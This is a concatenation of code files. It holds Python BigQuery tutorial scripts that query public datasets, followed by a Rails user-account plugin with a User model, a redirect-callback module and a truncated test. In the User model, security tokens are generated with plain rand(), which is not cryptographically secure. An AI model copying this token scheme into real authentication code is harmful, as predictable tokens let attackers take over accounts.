us_cities['city'].value_counts().head()
us_cities.city.value_counts().head()
### --------------------------------------------------------------------------
# multiple selection
query = """
SELECT city, country
FROM `bigquery-public-data.openaq.global_air_quality`
WHERE country = 'US'
"""
### --------------------------------------------------------------------------
# select all
query = """
SELECT *
FROM `bigquery-public-data.openaq.global_air_quality`
WHERE country = 'France'
"""
### --------------------------------------------------------------------------
# select distinct values
first_query = """
SELECT DISTINCT country
FROM `bigquery-public-data.openaq.global_air_quality`
WHERE unit = 'ppm'
"""
### --------------------------------------------------------------------------
# working with big datasets
### --------------------------------------------------------------------------
query = """
SELECT score, title
FROM `bigquery-public-data.hacker_news.full`
WHERE type = 'job'
"""
### --------------------------------------------------------------------------
### OPTION 1
### --------------------------------------------------------------------------
"""
Option 1: To begin,you can estimate the size of any query before running it. Here is an
example using the (very large!) Hacker News dataset. To see how much data a query will scan,
we create a
QueryJobConfig object and set the dry_run parameter to True .
"""
# Create a QueryJobConfig object to estimate size of query without r unning it
dry_run_config = bigquery.QueryJobConfig(dry_run = True)
# API request - dry run query to estimate costs
dry_run_query_job = client.query(query, job_config = dry_run_config)
print("This query will process {} bytes.".format(dry_run_query_job.total_bytes_processed))
### --------------------------------------------------------------------------
### OPTION 2
### --------------------------------------------------------------------------
"""
Option 2: You can also specify a parameter when running the query to limit how much
data you are willing to scan. Here's an example with a low limit.
"""
# Only run the query if it's less than 100 MB
ONE_HUNDRED_MB = 100*1000*1000
safe_config = bigquery.QueryJobConfig(maximum_bytes_billed=ONE_HUNDRED_MB)
# Set up the query (will only run if it's less than 100 MB)
safe_query_job = client.query(query, job_config=safe_config)
# API request - try to run the query, and return a pandas DataFrame
safe_query_job.to_dataframe()
### --------------------------------------------------------------------------
# Only run the query if it's less than 1 Go
ONE_GB = 1000*1000*1000
safe_config = bigquery.QueryJobConfig(maximum_bytes_billed=ONE_GB)
# Set up the query (will only run if it's less than 100 MB)
safe_query_job = client.query(query, job_config=safe_config)
# API request - try to run the query, and return a pandas DataFrame
job_post_scores = safe_query_job.to_dataframe()
# Print average score for job posts
job_post_scores.score.mean()
<file_sep>from google.cloud import bigquery
# Create a "Client" object
client = bigquery.Client()
# Construct a reference to the "chicago_taxi_trips" dataset
dataset_ref = client.dataset("chicago_taxi_trips", project="bigquery-public-data")
# API request - fetch the dataset
dataset = client.get_dataset(dataset_ref)
# List all the tables in the "chicago_taxi_trips" dataset
tables = list(client.list_tables(dataset))
# print list of tables
for table in tables:
print(table.table_id)
# Construct a reference to the "taxi_trips" table
table_ref = dataset_ref.table("taxi_trips")
# API request - fetch the table
table = client.get_table(table_ref)
# Preview the first five lines of the "taxi_trips" table
taxi_trips = client.list_rows(table, max_results=5).to_dataframe()
taxi_trips.info()
### --------------------------------------------------------------------------
### RIDES PER YEAR
### --------------------------------------------------------------------------
# Query to select the number of rides per year, sorted by year
rides_per_year_query = """
SELECT EXTRACT(YEAR FROM trip_start_timestamp) AS year,
COUNT(1) AS num_trips
FROM `bigquery-public-data.chicago_taxi_trips.taxi_trips`
GROUP BY year
ORDER BY year
"""
# Set up the query (cancel the query if it would use too much of
# your quota, with the limit set to 10 GB)
safe_config = bigquery.QueryJobConfig(maximum_bytes_billed=10**10)
rides_per_year_query_job = client.query(rides_per_year_query, job_config=safe_config)
# API request - run the query, and convert the results to a pandas DataFrame
rides_per_year_result = rides_per_year_query_job.to_dataframe()
### --------------------------------------------------------------------------
### RIDES PER MONTH
### --------------------------------------------------------------------------
# Query to select the number of rides per month in 2017
rides_per_month_query = """
SELECT EXTRACT(MONTH FROM trip_start_timestamp) AS month,
COUNT(1) AS num_trips
FROM `bigquery-public-data.chicago_taxi_trips.taxi_trips`
WHERE EXTRACT(YEAR FROM trip_start_timestamp) = 2017
GROUP BY month
ORDER BY month
"""
# Set up the query (cancel the query if it would use too much of
# your quota, with the limit set to 10 GB)
safe_config = bigquery.QueryJobConfig(maximum_bytes_billed=10**10)
rides_per_month_query_job = client.query(rides_per_month_query, job_config=safe_config)
# API request - run the query, and convert the results to a pandas DataFrame
rides_per_month_result = rides_per_month_query_job.to_dataframe()
### --------------------------------------------------------------------------
### SPEED
### --------------------------------------------------------------------------
# Query to assess the average speed per hour of day in H1 of 2017
speeds_query = """
WITH RelevantRides AS
(
SELECT trip_start_timestamp,
trip_miles,
trip_seconds
FROM `bigquery-public-data.chicago_taxi_trips.taxi_trips`
WHERE EXTRACT(YEAR FROM trip_start_timestamp) = 2017
AND EXTRACT(MONTH FROM trip_start_timestamp) >=1
AND EXTRACT(MONTH FROM trip_start_timestamp) <= 6
AND trip_seconds > 0
AND trip_miles > 0
)
SELECT EXTRACT(HOUR FROM trip_start_timestamp) AS hour_of_day,
3600 * SUM(trip_miles) / SUM(trip_seconds) AS avg_mph,
COUNT(1) AS num_trips
FROM RelevantRides
GROUP BY hour_of_day
ORDER BY hour_of_day
"""
# Set up the query (cancel the query if it would use too much of
# your quota, with the limit set to 10 GB)
safe_config = bigquery.QueryJobConfig(maximum_bytes_billed=10**10)
speeds_query_job = client.query(speeds_query, job_config=safe_config)
# API request - run the query, and convert the results to a pandas DataFrame
speeds_result = speeds_query_job.to_dataframe()
### --------------------------------------------------------------------------
### SPEED - ANSWER
### --------------------------------------------------------------------------
speeds_query = """
WITH RelevantRides AS
(
SELECT EXTRACT(HOUR FROM trip_start_timestamp) AS hour_of_day,
trip_miles,
trip_seconds
FROM `bigquery-public-data.chicago_taxi_trips.taxi_trips`
WHERE trip_start_timestamp > '2017-01-01' AND
trip_start_timestamp < '2017-07-01' AND
trip_seconds > 0 AND
trip_miles > 0
)
SELECT hour_of_day,
COUNT(1) AS num_trips,
3600 * SUM(trip_miles) / SUM(trip_seconds) AS avg_mph
FROM RelevantRides
GROUP BY hour_of_day
ORDER BY hour_of_day
"""
# Set up the query (cancel the query if it would use too much of
# your quota, with the limit set to 10 GB)
safe_config = bigquery.QueryJobConfig(maximum_bytes_billed=10**10)
speeds_query_job = client.query(speeds_query, job_config=safe_config)
# API request - run the query, and return a pandas DataFrame
speeds_result = speeds_query_job.to_dataframe()
# View results
print(speeds_result)
### --------------------------------------------------------------------------
### SPEED
### --------------------------------------------------------------------------
# Query to assess the max trip miles and min trip duration per hour of day in H1 of 2017
speeds_investigation_query = """
WITH RelevantRides AS
(
SELECT trip_start_timestamp,
trip_miles,
trip_seconds
FROM `bigquery-public-data.chicago_taxi_trips.taxi_trips`
WHERE EXTRACT(YEAR FROM trip_start_timestamp) = 2017
AND EXTRACT(MONTH FROM trip_start_timestamp) >=1
AND EXTRACT(MONTH FROM trip_start_timestamp) <= 6
AND trip_seconds > 0
AND trip_miles > 0
)
SELECT EXTRACT(HOUR FROM trip_start_timestamp) AS hour_of_day,
MAX(trip_miles) AS max_trip_miles,
MIN(trip_seconds) AS min_trip_seconds,
COUNT(1) AS num_trips
FROM RelevantRides
GROUP BY hour_of_day
ORDER BY hour_of_day
"""
# Set up the query (cancel the query if it would use too much of
# your quota, with the limit set to 10 GB)
safe_config = bigquery.QueryJobConfig(maximum_bytes_billed=10**10)
speeds_investigation_query_job = client.query(speeds_investigation_query, job_config=safe_config)
# API request - run the query, and return a pandas DataFrame
speeds_investigation_result = speeds_investigation_query_job.to_dataframe()
### --------------------------------------------------------------------------
# Query to assess the average trip miles and average trip duration per hour of day in H1 of 2017
speeds_investigation_query = """
WITH RelevantRides AS
(
SELECT trip_start_timestamp,
trip_miles,
trip_seconds
FROM `bigquery-public-data.chicago_taxi_trips.taxi_trips`
WHERE EXTRACT(YEAR FROM trip_start_timestamp) = 2017
AND EXTRACT(MONTH FROM trip_start_timestamp) >=1
AND EXTRACT(MONTH FROM trip_start_timestamp) <= 6
AND trip_seconds > 0
AND trip_miles > 0
)
SELECT EXTRACT(HOUR FROM trip_start_timestamp) AS hour_of_day,
AVG(trip_miles) AS avg_trip_miles,
AVG(trip_seconds) AS avg_trip_seconds,
COUNT(1) AS num_trips
FROM RelevantRides
GROUP BY hour_of_day
ORDER BY hour_of_day
"""
# Set up the query (cancel the query if it would use too much of
# your quota, with the limit set to 10 GB)
safe_config = bigquery.QueryJobConfig(maximum_bytes_billed=10**10)
speeds_investigation_query_job = client.query(speeds_investigation_query, job_config=safe_config)
# API request - run the query, and return a pandas DataFrame
speeds_investigation_result = speeds_investigation_query_job.to_dataframe()
<file_sep>from google.cloud import bigquery
# Create a "Client" object
client = bigquery.Client()
# Construct a reference to the "stackoverflow" dataset
dataset_ref = client.dataset("stackoverflow", project="bigquery-public-data")
# API request - fetch the dataset
dataset = client.get_dataset(dataset_ref)
# List all the tables in the "stackoverflow" dataset
tables = list(client.list_tables(dataset))
# get list of tables
tables = [table.table_id for table in tables]
# Construct a reference to the "posts_answers" table
answers_table_ref = dataset_ref.table("posts_answers")
# API request - fetch the table
answers_table = client.get_table(answers_table_ref)
# Preview the first five lines of the "posts_answers" table
client.list_rows(answers_table, max_results=5).to_dataframe()
# Construct a reference to the "posts_questions" table
questions_table_ref = dataset_ref.table("posts_questions")
# API request - fetch the table
questions_table = client.get_table(questions_table_ref)
# Preview the first five lines of the "posts_questions" table
client.list_rows(questions_table, max_results=5).to_dataframe()
# Construct the query: every Stack Overflow question tagged "bigquery".
questions_query = """
SELECT id, title, owner_user_id
FROM `bigquery-public-data.stackoverflow.posts_questions`
WHERE tags LIKE '%bigquery%'
"""
# Set up the query (cancel the query if it would use too much of
# your quota, with the limit set to 2 GB).
# BUG FIX: the cap was written as 20**9 (= 512,000,000,000 bytes, ~512 GB),
# which did not match the intended 2 GB limit; 2 * 10**9 bytes is 2 GB.
safe_config = bigquery.QueryJobConfig(maximum_bytes_billed=2 * 10**9)
questions_query_job = client.query(questions_query, job_config=safe_config)
# API request - run the query, and convert the results to a pandas DataFrame
questions = questions_query_job.to_dataframe()
# Construct the query: all answers to Stack Overflow questions tagged
# "bigquery", found by joining answers to their parent questions.
answers_query = """
SELECT a.id, a.body, a.owner_user_id
FROM `bigquery-public-data.stackoverflow.posts_questions` AS q
INNER JOIN `bigquery-public-data.stackoverflow.posts_answers` AS a
ON q.id = a.parent_id
WHERE q.tags LIKE '%bigquery%'
"""
# Set up the query (cancel the query if it would use too much of
# your quota, with the limit set to 10 GB)
safe_config = bigquery.QueryJobConfig(maximum_bytes_billed=10**10)
answers_query_job = client.query(answers_query, job_config=safe_config)
# API request - run the query, and convert the results to a pandas DataFrame
answers_results = answers_query_job.to_dataframe()
"""
# here is a query that works.....
answers_query = """
SELECT a.id, a.body, a.owner_user_id
FROM `bigquery-public-data.stackoverflow.posts_questions` AS q
INNER JOIN `bigquery-public-data.stackoverflow.posts_answers` AS a
ON q.id = a.parent_id
WHERE q.tags LIKE '%bigquery%'
"""
# Set up the query (cancel the query if it would use too much of
# your quota, with the limit set to 1 GB)
safe_config = bigquery.QueryJobConfig(maximum_bytes_billed=10**9)
answers_query_job = client.query(answers_query, job_config=safe_config)
# API request - run the query, and return a pandas DataFrame
answers_results = answers_query_job.to_dataframe()
"""
# Careful with tab: should align with """?
# Need to group by a.owner_user_id instead of user_id?
# why is it on ON q.id = a.parent_Id (wih Capital I) and not ON q.id = a.parent_id?
bigquery_experts_query = """
SELECT a.owner_user_id AS user_id, COUNT(1) AS number_of_answers
FROM `bigquery-public-data.stackoverflow.posts_questions` AS q
INNER JOIN `bigquery-public-data.stackoverflow.posts_answers` AS a
ON q.id = a.parent_id
WHERE q.tags LIKE '%bigquery%'
GROUP BY a.owner_user_id
"""
# Set up the query (cancel the query if it would use too much of
# your quota, with the limit set to 1 GB)
safe_config = bigquery.QueryJobConfig(maximum_bytes_billed=10**9)
bigquery_experts_query_job = client.query(bigquery_experts_query, job_config=safe_config)
# API request - run the query, and convert the results to a pandas DataFrame
bigquery_experts_results = bigquery_experts_query_job.to_dataframe()
# Topic whose top answerers we want to list.
topic = 'python'

def list_experts(topic):
    """Print the users with the most answers to questions tagged `topic`.

    Joins questions to answers on the parent-question id, counts answers per
    answer author, and prints the head of the result sorted by descending
    answer count. Relies on the module-level `client` (a bigquery.Client)
    and the `bigquery` module.
    """
    # Construct the query; the topic is substituted into the LIKE pattern.
    # Normalized the column reference to `a.parent_id` (lowercase) for
    # consistency with the rest of this file; BigQuery column references
    # are case-insensitive, so behavior is unchanged.
    topic_experts_query = """
                          SELECT a.owner_user_id AS user_id, COUNT(1) AS number_of_answers
                          FROM `bigquery-public-data.stackoverflow.posts_questions` AS q
                              INNER JOIN `bigquery-public-data.stackoverflow.posts_answers` AS a
                                  ON q.id = a.parent_id
                          WHERE q.tags LIKE '%{}%'
                          GROUP BY a.owner_user_id
                          ORDER BY number_of_answers DESC
                          """.format(topic)

    # Set up the query (cancel the query if it would use too much of
    # your quota, with the limit set to 2 GB).
    # BUG FIX: the cap was 20**9 (~512 GB), not the 2 GB the comment
    # promised; 2 * 10**9 bytes is 2 GB.
    safe_config = bigquery.QueryJobConfig(maximum_bytes_billed=2 * 10**9)
    topic_experts_query_job = client.query(topic_experts_query, job_config=safe_config)

    # API request - run the query, and convert the results to a pandas DataFrame
    topic_experts_results = topic_experts_query_job.to_dataframe()

    # Preview results
    print(topic_experts_results.head())

# get results
list_experts(topic)
"""
# code in the solution...
bigquery_experts_query = """
SELECT a.owner_user_id AS user_id, COUNT(1) AS number_of_answers
FROM `bigquery-public-data.stackoverflow.posts_questions` AS q
INNER JOIN `bigquery-public-data.stackoverflow.posts_answers` AS a
ON q.id = a.parent_Id
WHERE q.tags LIKE '%bigquery%'
GROUP BY a.owner_user_id
"""
"""
<file_sep>from google.cloud import bigquery
# Create a "Client" object
client = bigquery.Client()
# Construct a reference to the "github_repos" dataset
dataset_ref = client.dataset("github_repos", project="bigquery-public-data")
# API request - fetch the dataset
dataset = client.get_dataset(dataset_ref)
# Construct a reference to the "licenses" table
licenses_ref = dataset_ref.table("licenses")
# API request - fetch the table
licenses_table = client.get_table(licenses_ref)
# Preview the first five lines of the "licenses" table
client.list_rows(licenses_table, max_results=5).to_dataframe()
# Construct a reference to the "sample_files" table
files_ref = dataset_ref.table("sample_files")
# API request - fetch the table
files_table = client.get_table(files_ref)
# Preview the first five lines of the "sample_files" table
client.list_rows(files_table, max_results=5).to_dataframe()
# Construct the query
file_count_by_license_query = """
SELECT l.license AS license, COUNT(1) AS num_files
FROM `bigquery-public-data.github_repos.licenses` AS l
INNER JOIN `bigquery-public-data.github_repos.sample_files` AS s
ON l.repo_name = s.repo_name
GROUP BY license
ORDER BY num_files DESC
"""
# Set up the query (cancel the query if it would use too much of
# your quota, with the limit set to 10 GB)
safe_config = bigquery.QueryJobConfig(maximum_bytes_billed=10**10)
file_count_by_license_query_job = client.query(file_count_by_license_query, job_config=safe_config)
# API request - run the query, and convert the results to a pandas DataFrame
file_count_by_license = file_count_by_license_query_job.to_dataframe()
<file_sep>
# import libraries
from google.cloud import bigquery
# create a client object (credentials are read from the environment)
client = bigquery.Client()
### --------------------------------------------------------------------------
### GROUP BY / HAVING -- count comments per parent post
### (section was previously mislabeled "SELECT FROM")
### --------------------------------------------------------------------------
# Construct a reference to the "hacker_news" dataset
dataset_ref = client.dataset("hacker_news", project="bigquery-public-data")
# API request - fetch the dataset
dataset = client.get_dataset(dataset_ref)
# construct a reference to the "comments" table
table_ref = dataset_ref.table("comments")
# API request - fetch the table
table = client.get_table(table_ref)
# Print information on all the columns in the "comments" table in the "hacker_news" dataset
table.schema
# Preview the first five rows of the "comments" table
client.list_rows(table, max_results = 5).to_dataframe()
# query: parents that received more than ten comments
query = """
SELECT parent, COUNT(id)
FROM `bigquery-public-data.hacker_news.comments`
GROUP BY parent
HAVING COUNT(id) > 10
"""
# Set up the query (cancel the query if it would use too much of
# your quota, with the limit set to 1 GB)
safe_config = bigquery.QueryJobConfig(maximum_bytes_billed=10**9)
query_job = client.query(query, job_config=safe_config)
# API request - run the query, and convert the results to a pandas DataFrame
popular_comments = query_job.to_dataframe()
# Print the first five rows of the DataFrame
popular_comments.head()
### --------------------------------------------------------------------------
### ALIASING AND OTHER IMPROVEMENTS
### --------------------------------------------------------------------------
# Same query as above, with a readable alias (NumPosts) and COUNT(1),
# which lets BigQuery avoid reading the id column.
query = """
SELECT parent, COUNT(1) AS NumPosts
FROM `bigquery-public-data.hacker_news.comments`
GROUP BY parent
HAVING COUNT(1) > 10
"""
# Set up the query (cancel the query if it would use too much of
# your quota, with the limit set to 1 GB)
safe_config = bigquery.QueryJobConfig(maximum_bytes_billed=10**9)
query_job = client.query(query, job_config=safe_config)
# API request - run the query, and convert the results to a pandas DataFrame
popular_comments = query_job.to_dataframe()
# Print the first five rows of the DataFrame
popular_comments.head()
<file_sep>
# import libraries
from google.cloud import bigquery
# create a client object (credentials are read from the environment)
client = bigquery.Client()
### --------------------------------------------------------------------------
### Fetch data from bigquery-public-data
### --------------------------------------------------------------------------
# Construct a reference to the "hacker_news" dataset
dataset_ref = client.dataset("hacker_news", project="bigquery-public-data")
# API request - fetch the dataset
dataset = client.get_dataset(dataset_ref)
# List all the tables in the "hacker_news" dataset
tables = list(client.list_tables(dataset))
# print list of tables
for table in tables:
    print(table.table_id)
# construct a reference to the "full" table
table_ref = dataset_ref.table("full")
# API request - fetch the table
table = client.get_table(table_ref)
# Print information on all the columns in the "full" table in the "hacker_news" dataset
table.schema
# Preview the first five lines of the "full" table
client.list_rows(table, max_results = 5).to_dataframe()
### --------------------------------------------------------------------------
### SELECT FROM
### --------------------------------------------------------------------------
# Construct a reference to the "openaq" dataset
# (open air-quality measurements; see https://openaq.org/#/?_k=esd1sb)
dataset_ref = client.dataset("openaq", project="bigquery-public-data")
# API request - fetch the dataset
dataset = client.get_dataset(dataset_ref)
# construct a reference to the "global_air_quality" table
table_ref = dataset_ref.table("global_air_quality")
# API request - fetch the table
table = client.get_table(table_ref)
# Print information on all the columns in the "global_air_quality" table in the "openaq" dataset
table.schema
# Preview the first five rows of the "global_air_quality" table
client.list_rows(table, max_results = 5).to_dataframe()
# query: cities in the US that have air-quality measurements.
# NOTE(review): the query string is only defined here -- nothing below
# in this file actually executes it.
query = """
SELECT city
FROM `bigquery-public-data.openaq.global_air_quality`
WHERE country = 'US'
"""
| ddbf4b948a8331ad5b379b2cac420592d52d751a | [
"Markdown",
"Python"
] | 9 | Markdown | linetonthat/sqlbigquery | 52d827705c46cd694b1d19c4940f6ec326fa1409 | 6e20af5beaf76c558b6bab42ad99ccd213acf8e4 |
refs/heads/master | <file_sep># Copyright (c) 2008 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# A user is the identity of someone who has access to the site.
# It is not an authentication mechanism.
#
class User < ActiveRecord::Base
  # Active sessions belonging to this user; cleared on each login
  # (see #logged_in below).
  has_many :sessions

  # Creation/save hooks -- implementations are the private methods below.
  before_create :mark_as_verified_if_email_verification_not_required
  before_create :set_security_token_if_needed
  before_create :set_default_nickname
  before_save :set_lowercase_login

  validate :presence_of_email_if_required_or_explicitly_validated
  validates_presence_of :login
  # Logins are case-insensitive, so uniqueness must ignore case too.
  validates_uniqueness_of :login,
    :case_sensitive => false,
    :identifier => 'unique_login'
  validates_uniqueness_of :email,
    :allow_blank => true,
    :identifier => 'unique_email'
  validates_uniqueness_of :security_token,
    :allow_blank => true,
    :identifier => 'unique_security_token'

  attr_reader :error_message
  # Keep security- and moderation-related columns out of mass assignment.
  attr_protected :security_token, :security_token_created_at
  attr_protected :verified, :disabled_from, :disabled_until

  named_scope :verified, {:conditions => {:verified => true}}
  named_scope :unverified,
    {:conditions => ['verified IS NULL OR verified = ?', false]}
  named_scope :ordered_by_login, {:order => 'login'}
  # Case-insensitive lookup via the lowercase_login shadow column
  # maintained by set_lowercase_login.
  named_scope :for_login, proc{|l|
    {:conditions => {:lowercase_login => l.downcase}}
  }
  # Match a token that is either unexpired or has no expiry at all.
  named_scope :for_security_token, proc{|tok|
    {:conditions => [
      'security_token = ? AND ' +
      '(security_token_valid_until >= ? OR security_token_valid_until IS NULL)',
      tok, Time.now
    ]}
  }

  ##
  #
  # Login is a protected field. It should not be reset once it has been
  # committed. Also, we track lowercase_login to compute uniqueness against
  # other logins, since we want logins to be case insensitive, so set it here
  # as well. Additionally, configuration may specify that we use an
  # email address as a login, so set the email address off this field
  # if that is the case.
  #
  def login= new_login
    # when the email doubles as the login, only email= may write :login
    return if UserSystem.email_is_login
    # don't allow it to be re-set (a case-only change is still permitted)
    if new_record? or login.blank? or new_login.downcase == login.downcase
      write_attribute(:login, new_login)
    end
  end

  ##
  #
  # Email can also act as the login name of the user based on configuration
  #
  # Changing the email when verification is on will mark the record as
  # unverified, and wait for the user to verify the new email address.
  #
  def email= eml
    write_attribute :email, eml
    if UserSystem.email_is_login
      write_attribute :login, eml
    end
    write_attribute :verified, false if UserSystem.verify_email and !new_record?
  end

  ##
  #
  # Mark the login time and do some other housekeeping.
  # This should be called by each authentication module.
  # (auth_module is currently unused in the body.)
  #
  def logged_in auth_module
    # :previous_login is evaluated before the update runs, so it captures
    # the prior last_login value
    update_attributes(
      :last_login => Time.now,
      :previous_login => last_login
    )
    # drop any outstanding session records for this user
    sessions.clear
  end

  ##
  #
  # Set a new security token and timeout.
  # Pass nil/false for has_duration to issue a token that never expires.
  #
  def update_security_token! has_duration=20.minutes
    self.security_token = generate_security_token
    if has_duration
      self.security_token_valid_until = Time.now + has_duration
    end
    save!
  end

  ##
  #
  # Mark the record as verified
  #
  def verify!
    update_attribute(:verified, true)
  end

  ##
  #
  # Override the security_token getter, generate one if none exists
  #
  def security_token
    unless read_attribute(:security_token)
      # make sure to save it immediately if we need to
      if new_record?
        self.security_token = generate_security_token
      else
        update_attribute(:security_token, generate_security_token)
      end
    end
    read_attribute(:security_token)
  end

  # This method is used by authentication modules.
  # Make sure the user is validated.
  # This can be chained around by other plugins.
  def self.authentication_scope
    self.verified
  end

  private

  # Validation: email is mandatory whenever we verify addresses or
  # explicitly require one.
  def presence_of_email_if_required_or_explicitly_validated
    if UserSystem.verify_email or UserSystem.require_email
      errors.add_on_blank :email, "should not be blank"
    end
  end

  # before_create: without email verification, accounts start verified.
  def mark_as_verified_if_email_verification_not_required
    unless UserSystem.verify_email
      self.verified = true
    end
  end

  # before_create: issue a token up front when verification (or config)
  # demands one.
  def set_security_token_if_needed
    if UserSystem.verify_email or UserSystem.always_generate_security_token
      self.security_token = generate_security_token
    end
  end

  # Build a random token whose length falls between the configured minimum
  # and maximum, drawn from the configured character set.
  def generate_security_token
    diff = UserSystem.maximum_security_token_length - \
      UserSystem.minimum_security_token_length
    len = rand(diff) + UserSystem.minimum_security_token_length
    rv = ''
    chrs = UserSystem.security_token_characters
    len.times{ rv << chrs[rand(chrs.length)] }
    rv
  end

  # before_save: keep the case-insensitive shadow column in sync.
  def set_lowercase_login
    self.lowercase_login = self.login.downcase
  end

  # before_create: default the display name to the login.
  def set_default_nickname
    self.nickname ||= login
  end
end
<file_sep># Copyright (c) 2008 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# UserRedirect handles redirecting users upon login, account creation, and
# other points in the application when performing actions on the user. It is
# only useful when included in a controller. It expects redirect_to to be
# a method to be called if a callback redirects (and hide_action to keep
# callbacks from showing up as actions).
#
# It needs to be extensible so other methods can hook into it. To this end it
# uses ActiveSupport::Callbacks. To add a new callback use
# module MyModuleWithMyCallback
# def my_method user_record
# # check a condition, maybe redirect
# # return non-false to pass on to later callbacks
# end
# end
# UserRedirect.on_redirection :my_method
# UserRedirect.send :include, MyModuleWithMyCallback
# see UserEmailVerificationRedirect for an example
#
module UserRedirect
  private

  # Names of every registered redirection callback, shared across all
  # controllers that include this module.
  @@callback_names = []
  mattr_accessor :callback_names

  # Every class that has included UserRedirect so far.
  @@included_in = []
  mattr_accessor :included_in

  # Every helper module mixed into UserRedirect (e.g.
  # UserEmailVerificationRedirect), replayed into later includers.
  @@inclusive = []
  mattr_accessor :inclusive

  # This way a callback gets added to us (and everything we will be included
  # in later) and to the things we were mixed into before we got the new
  # methods.
  def self.on_redirection symbol
    callback_names << symbol
    included_in.each{|x| x.on_redirection(symbol)}
  end

  # When a class includes this module, we need to remember the class so we can
  # add methods that are added to us later on back into it.
  # Every module we have included, the class including us should include as well
  # so it can have all the methods and any self.included hooks can run.
  def self.included kls
    # remember this in case other callbacks come online later
    included_in << kls
    # if we already have other modules providing callbacks, mix them in
    inclusive.each{|m| kls.send :include, m}
    # introduce callback mojo
    # the callbacks are built per including controller
    # so one controller may include some others don't
    # but each controller get everything mixed directly into UserRedirect
    kls.send :include, ActiveSupport::Callbacks
    kls.send :define_callbacks, :on_redirection
    # keep our bookkeeping accessors from becoming routable actions
    kls.send :hide_action, :callback_names, :callback_names=,
      :included_in, :included_in=,
      :run_callbacks
    callback_names.each{|x| kls.on_redirection(x)}
  end

  # When we include something, we remember it so we can include it into
  # everything else later on, and we include it in anything we're already in.
  def self.include mod
    super
    included_in.each{|c| c.send(:include, mod)}
    inclusive << mod
  end

  # Walk through all the callbacks that have been registered until
  # one redirects.
  # NOTE(review): the callback return value (rv) is unused; the chain
  # stops only once a redirect has actually been performed.
  def user_redirect user_record
    self.class.on_redirection_callback_chain.each do |callback|
      rv = callback.call(self, user_record)
      break if performed?
    end
    # fall back: stored location first, then the configured default
    go_back unless performed?
    go_to_default unless performed?
  end

  # Redirect back to stored location, if any
  def go_back
    if session[:last_params]
      redirect_to session[:last_params]
      session[:last_params] = nil
    end
  end

  # Go to a configurable default, or just root_path
  def go_to_default
    if p = UserSystem.default_path
      # a Symbol names a URL-helper method; anything else is used verbatim
      v = p.is_a?(Symbol) ? send(p) : p
      redirect_to(v)
    else
      redirect_to root_path
    end
  end
end
##
# A module to check email verification that is mixed into UserRedirect
#
# Mixed into UserRedirect: steers users who have not yet verified their
# email address to the verification request page, but only when the site
# is configured to verify email at all.
module UserEmailVerificationRedirect
  # Redirection callback; not redirecting lets later callbacks in the
  # chain get their turn.
  def verify_email user_record
    return unless UserSystem.verify_email
    unless user_record.verified
      redirect_to request_verification_user_path(user_record)
    end
  end
end

# Register the callback name, then mix the module into UserRedirect
# (and, through it, into every controller that already includes it).
UserRedirect.on_redirection :verify_email
UserRedirect.include UserEmailVerificationRedirect
<file_sep># Copyright (c) 2008 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
require File.join(File.dirname(__FILE__), '..', 'user_system_test_helper')
# Exercises UserSystemLoginFilters by mixing it into a throwaway
# controller class and stubbing the Rails session hash.
context 'The Login Filter', ActiveSupport::TestCase do
  setup do
    # A controller defined just for these tests.
    class M < ActionController::Base
      include UserSystemLoginFilters
    end
    @kls = M.new
    @user = Factory(:user)
    @session = Session.create!(:user => @user)
    # NOTE(review): the stub stores @user.id under :session_id; if the
    # filter looks sessions up by Session#id this only works when the two
    # ids happen to coincide -- verify against UserSystemLoginFilters.
    @kls.stubs(:session).returns({:session_id => @user.id})
  end
  it 'should return the current user from the session' do
